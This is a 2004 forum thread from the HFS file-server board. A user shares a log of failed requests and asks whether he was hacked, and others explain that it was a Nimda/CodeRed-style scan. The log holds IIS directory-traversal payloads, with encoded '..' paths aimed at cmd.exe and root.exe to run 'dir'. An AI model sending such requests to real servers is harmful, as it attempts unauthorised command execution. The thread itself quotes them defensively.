rejetto forum

Software => HFS ~ HTTP File Server => Topic started by: TGeRi on June 21, 2004, 04:21:35 PM

Title: someone tried to hack me
Post by: TGeRi on June 21, 2004, 04:21:35 PM

Hi!

I see this in my log:

18:14:59  81.50.202.51:3135 Requested GET/scripts/root.exe?/c dir
18:14:59  81.50.202.51:3135 Served not - 404
18:15:01  81.50.202.51:3154 Requested GET/MSADC/root.exe?/c dir
18:15:01  81.50.202.51:3154 Served not - 404
18:15:03  81.50.202.51:3181 Requested GET/c/winnt/system32/cmd.exe?/c dir
18:15:03  81.50.202.51:3181 Served not - 404
18:15:05  81.50.202.51:3210 Requested GET/d/winnt/system32/cmd.exe?/c dir
18:15:05  81.50.202.51:3210 Served not - 404
18:15:07  81.50.202.51:3232 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
18:15:07  81.50.202.51:3232 Served not - 404
18:15:09  81.50.202.51:3265 Requested GET/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
18:15:09  81.50.202.51:3265 Served not - 404
18:15:11  81.50.202.51:3290 Requested GET/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
18:15:11  81.50.202.51:3290 Served not - 404
18:15:13  81.50.202.51:3319 Requested GET/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c dir
18:15:13  81.50.202.51:3319 Served not - 404
18:15:15  81.50.202.51:3351 Requested GET/scripts/..Á../winnt/system32/cmd.exe?/c dir
18:15:15  81.50.202.51:3351 Served not - 404
18:15:17  81.50.202.51:3375 Requested GET/scripts/..À/../winnt/system32/cmd.exe?/c dir
18:15:17  81.50.202.51:3375 Served not - 404
18:15:19  81.50.202.51:3408 Requested GET/scripts/..À¯../winnt/system32/cmd.exe?/c dir
18:15:19  81.50.202.51:3408 Served not - 404
18:15:21  81.50.202.51:3433 Requested GET/scripts/..Áœ../winnt/system32/cmd.exe?/c dir
18:15:21  81.50.202.51:3433 Served not - 404
18:15:23  81.50.202.51:3466 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
18:15:23  81.50.202.51:3466 Served not - 404
18:15:25  81.50.202.51:3491 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
18:15:25  81.50.202.51:3491 Served not - 404
18:15:27  81.50.202.51:3517 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
18:15:27  81.50.202.51:3517 Served not - 404
18:15:29  81.50.202.51:3545 Requested GET/scripts/..%2f../winnt/system32/cmd.exe?/c dir
18:15:29  81.50.202.51:3545 Served not - 404

I think he was unabel to do anything. AM i right? Is hfs safe and secure?

TGeRi

Title: someone tried to hack me
Post by: Mr. Anon on June 21, 2004, 06:58:42 PM

Looks like a Nimda scan to me.
You should not have to worry since HFS does not use any scripts that IIS uses.
To avoid yourself being scanned, you should use HFS on a non-standard port. (e.g. port #13578)

Title: someone tried to hack me
Post by: AwPhuch on September 28, 2004, 09:06:44 PM

Quote from: "Mr. Anon"

Looks like a Nimda scan to me.
You should not have to worry since HFS does not use any scripts that IIS uses.
To avoid yourself being scanned, you should use HFS on a non-standard port. (e.g. port #13578)

and have a good firewall!!!

Brian
AwPhuch

Title: someone tried to hack me
Post by: Mr. Anon on September 28, 2004, 10:52:07 PM

A firewall won't help if you are opening a server to a port that is venerable for attacks. But in this case, HFS is not affected by CodeRed attacks.